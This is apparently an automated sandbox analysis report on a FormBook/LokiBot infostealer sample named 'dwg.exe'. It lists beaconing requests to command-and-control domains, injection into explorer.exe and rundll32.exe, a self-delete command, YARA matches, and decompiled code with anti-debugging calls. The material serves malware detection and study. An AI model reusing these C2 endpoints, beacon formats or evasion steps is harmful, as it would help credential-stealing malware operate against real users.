                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:32.568774939 CET5767OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:33.678253889 CET5768OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:35.896950960 CET5768OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:38.115953922 CET5768OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:40.335508108 CET5769OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:44.772839069 CET5771OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:53.696007013 CET5957OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.54973494.136.40.5180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:44.252448082 CET5770OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1
                                                Host: www.karatetheokinawaway.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:44.309845924 CET5771INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:43 GMT
                                                Content-Type: text/html
                                                Content-Length: 793
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: dwg.exe PID: 5316 Parent PID: 5568

                                                General

                                                Start time:15:33:53
                                                Start date:25/02/2021
                                                Path:C:\Users\user\Desktop\dwg.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x400000
                                                File size:98304 bytes
                                                MD5 hash:6A9035B7435C6AA9E6C8E31CF771E316
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Visual Basic
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: dwg.exe PID: 1544 Parent PID: 5316

                                                General

                                                Start time:15:34:05
                                                Start date:25/02/2021
                                                Path:C:\Users\user\Desktop\dwg.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x400000
                                                File size:98304 bytes
                                                MD5 hash:6A9035B7435C6AA9E6C8E31CF771E316
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: explorer.exe PID: 3472 Parent PID: 1544

                                                General

                                                Start time:15:34:18
                                                Start date:25/02/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:
                                                Imagebase:0x7ff693d90000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6456 Parent PID: 3472

                                                General

                                                Start time:15:34:30
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                Imagebase:0xa90000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, Author: Florian Roth
                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 6492 Parent PID: 6456

                                                General

                                                Start time:15:34:35
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x12c0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: conhost.exe PID: 6500 Parent PID: 6492

                                                General

                                                Start time:15:34:36
                                                Start date:25/02/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7ecfc0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: dwg.exe PID: 5316 Parent PID: 5568 dwg.exeCOMMON

                                                  Executed Functions

                                                  Function 0216329B, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 547nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12), ref: 0216069E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID: 1.!T
                                                  • API String ID: 4046476035-3147410236
                                                  • Opcode ID: 778a0ecc1e93a5057793f9f9b232c05c332d08b5962503bcc5184f9629fee893
                                                  • Instruction ID: 6ff6066bc9f434db323766cd857087856fa4aec033fa960ffeed4ad65467b7bd
                                                  • Opcode Fuzzy Hash: 778a0ecc1e93a5057793f9f9b232c05c332d08b5962503bcc5184f9629fee893
                                                  • Instruction Fuzzy Hash: C3025770780346AEFF305E20CD99BFE3667AF45780F558129EE95AB1C0D7B688A4CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02163522, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 490COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0={,$shell32
                                                  • API String ID: 0-4280706295
                                                  • Opcode ID: b0b3accc0aa19db92fde73ca18b002a05ec8f50a0ec5e639dc88254c2a2c4cf7
                                                  • Instruction ID: 3273a58a64630ad027747b4183c7ffc7d5a12e61693cdb952774ca212a94a330
                                                  • Opcode Fuzzy Hash: b0b3accc0aa19db92fde73ca18b002a05ec8f50a0ec5e639dc88254c2a2c4cf7
                                                  • Instruction Fuzzy Hash: CEF167B0680306AFEF34AF20DCA87FE3A67BF45740F518129ED5697280D7B588A5CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216056A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumWindows.USER32(021605A6,?,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02160578
                                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12), ref: 0216069E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: EnumInformationThreadWindows
                                                  • String ID: 1.!T
                                                  • API String ID: 1954852945-3147410236
                                                  • Opcode ID: 2ec52c2a00bc989f1670dc8b94435457eb495474921f972f13dd64dfe109db23
                                                  • Instruction ID: 1eaab81e1a87b8a089027b3c7ff7e689f90e1be677cc5a30e37101a8f0145e32
                                                  • Opcode Fuzzy Hash: 2ec52c2a00bc989f1670dc8b94435457eb495474921f972f13dd64dfe109db23
                                                  • Instruction Fuzzy Hash: 72315C787843166EEB206E745CADBFE2792AF597A0F954206FC66672C0C760C890CE41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02165DF8, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 558COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H}e
                                                  • API String ID: 0-725671990
                                                  • Opcode ID: f234d28e68ffefb9b7e733f5e318ac042a562da4a30586505144317f764086cd
                                                  • Instruction ID: 4c7a2d48258b83d2b9098200a8e5b06b22eed91bb63355e9ab198deb00943b48
                                                  • Opcode Fuzzy Hash: f234d28e68ffefb9b7e733f5e318ac042a562da4a30586505144317f764086cd
                                                  • Instruction Fuzzy Hash: 9CD1BD6129D3D04EEB0E5734889E77D7F6BDB12219F59408EC8C283C93EB9A9863C315
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401348, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 332COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edi, void* __fp0) {
				intOrPtr* _t8;
				void* _t22;

				_push("VB5!6&*"); // executed
				L00401342(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t8 = __eax + 1;
				 *_t8 =  *_t8 + _t8;
				 *_t8 =  *_t8 + _t8;
				 *_t8 =  *_t8 + _t8;
				 *((intOrPtr*)(__ecx - 0x62)) =  *((intOrPtr*)(__ecx - 0x62)) + __ebx;
				asm("sbb dh, [edi+0x4685efce]");
				asm("stosd");
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *__ecx =  *__ecx + 0xe57bccee;
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *((intOrPtr*)(__ecx + 0x4e)) =  *((intOrPtr*)(__ecx + 0x4e)) + 0xe57bccee;
				_push(_t24);
				_push(_t17);
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				 *0xe57bccee = 0xe57bccee +  *0xe57bccee;
				asm("int3");
				 *0xe57bccee =  *0xe57bccee ^ 0xe57bccee;
				 *(_t22 + 0x17) =  *(_t22 + 0x17) & 0xe57bccee;
				asm("rol dh, cl");
				asm("jecxz 0x16");
				asm("movsb");
				return 0xffffffffa44a84e0;
			}





                                                  0x00401348
                                                  0x0040134d
                                                  0x00401352
                                                  0x00401354
                                                  0x00401356
                                                  0x00401358
                                                  0x0040135a
                                                  0x0040135c
                                                  0x0040135d
                                                  0x0040135f
                                                  0x00401361
                                                  0x00401363
                                                  0x00401366
                                                  0x0040136c
                                                  0x00401375
                                                  0x00401377
                                                  0x00401379
                                                  0x0040137b
                                                  0x0040137d
                                                  0x0040137f
                                                  0x00401381
                                                  0x00401383
                                                  0x00401386
                                                  0x0040138d
                                                  0x00401391
                                                  0x00401393
                                                  0x00401395
                                                  0x00401399
                                                  0x0040139a
                                                  0x0040139c
                                                  0x0040139f
                                                  0x004013a6
                                                  0x004013a8
                                                  0x004013ab

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: #100
                                                  • String ID: VB5!6&*
                                                  • API String ID: 1341478452-3593831657
                                                  • Opcode ID: eb1cb6e98ecc61c2ff0206536a6d511f0e27af9a64f031b9c19bf081ba377800
                                                  • Instruction ID: db023b60e15381d83258d87f2b459b807635d2a939bd028904d7dc384a2b9641
                                                  • Opcode Fuzzy Hash: eb1cb6e98ecc61c2ff0206536a6d511f0e27af9a64f031b9c19bf081ba377800
                                                  • Instruction Fuzzy Hash: 36B11B6544E3C16FD31387785C2A59ABFB0AE9721875E44EFC4C18F4E3D21A889AC727
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02160540, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12), ref: 0216069E
                                                    • Part of subcall function 0216056A: EnumWindows.USER32(021605A6,?,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02160578
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: EnumInformationThreadWindows
                                                  • String ID: 1.!T
                                                  • API String ID: 1954852945-3147410236
                                                  • Opcode ID: 6c5e88e6ee4a30c40d40d03f7d101cce2586ec06fa4863631f40b061d3d60cc2
                                                  • Instruction ID: 1908d06a1360b03945544c21301d7e0f7b550111bc08ef4067c2398504980e31
                                                  • Opcode Fuzzy Hash: 6c5e88e6ee4a30c40d40d03f7d101cce2586ec06fa4863631f40b061d3d60cc2
                                                  • Instruction Fuzzy Hash: 7F4187B03883155EEB21AE304CAD7FE2B53BF5A754F954249EC92171C2D7A2C850CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021605B6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12), ref: 0216069E
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationLibraryLoadThread
                                                  • String ID: 1.!T
                                                  • API String ID: 543350213-3147410236
                                                  • Opcode ID: f91290f1e66af40a0216f69917b22df0abdfa4397193ae021a3f9a318cbe3ab2
                                                  • Instruction ID: 9e280a75567081f643ff65adee783fc3e233fea48437703c292e77d90414ad6b
                                                  • Opcode Fuzzy Hash: f91290f1e66af40a0216f69917b22df0abdfa4397193ae021a3f9a318cbe3ab2
                                                  • Instruction Fuzzy Hash: 92318E747843166EEF206E705DBD7FE2B93AF59754F954209EC92271C0D7A0C850CA41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02160602, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12), ref: 0216069E
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationLibraryLoadThread
                                                  • String ID: 1.!T
                                                  • API String ID: 543350213-3147410236
                                                  • Opcode ID: 2a63cee48ca966068f875d49c779035ba4b3de96e1f9023a1d30ed64ba04b6c2
                                                  • Instruction ID: 4e4090b2dec6afb2e3c552cfb018e997ca2cf19f1581b7d896bb0306e60a6064
                                                  • Opcode Fuzzy Hash: 2a63cee48ca966068f875d49c779035ba4b3de96e1f9023a1d30ed64ba04b6c2
                                                  • Instruction Fuzzy Hash: 82219D743843266EEF306D305CA9BFE2B53AF59BA4F940209ED622B1C0D7A1C850CA81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02165C3B, Relevance: 2.0, APIs: 1, Instructions: 511COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7851e7fa58c8a4bf695e90a593035bc70ef30b7ba8e85a6e606965abe6a1a37
                                                  • Instruction ID: 7eede2a39d7f03558987b9cd18052a174fc5eb7bb1e29fc4ebf758fcca7dc4e2
                                                  • Opcode Fuzzy Hash: d7851e7fa58c8a4bf695e90a593035bc70ef30b7ba8e85a6e606965abe6a1a37
                                                  • Instruction Fuzzy Hash: 5BC1EC7129C3909EEB1D9A24C89E7BD7B6BDF03225F89419EC8D3834D3E7999462C311
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216180C, Relevance: 1.9, APIs: 1, Instructions: 404COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 609642d0e3295e5e8ef0ad6278b0012d9f158c3a974d25965bfd33efd04ff442
                                                  • Instruction ID: 72f64678a64c268f8cb69cb91db22e99ef5d44bb8bbdf22682c0b23208e7b6a3
                                                  • Opcode Fuzzy Hash: 609642d0e3295e5e8ef0ad6278b0012d9f158c3a974d25965bfd33efd04ff442
                                                  • Instruction Fuzzy Hash: 6AD117B0380346AEFF341E20CD59BFE3666AF41784F554128FE59AB1D0C7BA88A5CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02165E08, Relevance: 1.9, APIs: 1, Instructions: 387COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52e3907f4eb29c1ed1c07f3583ba83eaa03fd49baa5b71697ef56eaf06fc558a
                                                  • Instruction ID: fe98eca5feb34b399edeecc98e2125bb9a567c4762ede61546fa9725fbaae9d8
                                                  • Opcode Fuzzy Hash: 52e3907f4eb29c1ed1c07f3583ba83eaa03fd49baa5b71697ef56eaf06fc558a
                                                  • Instruction Fuzzy Hash: 9C918C7125C7D09EEB0E9A24C89EBBD7B6BDB03211F49409EC8C3834A3E759D862C751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021664C6, Relevance: 1.9, APIs: 1, Instructions: 377nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(00000004,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021666DF
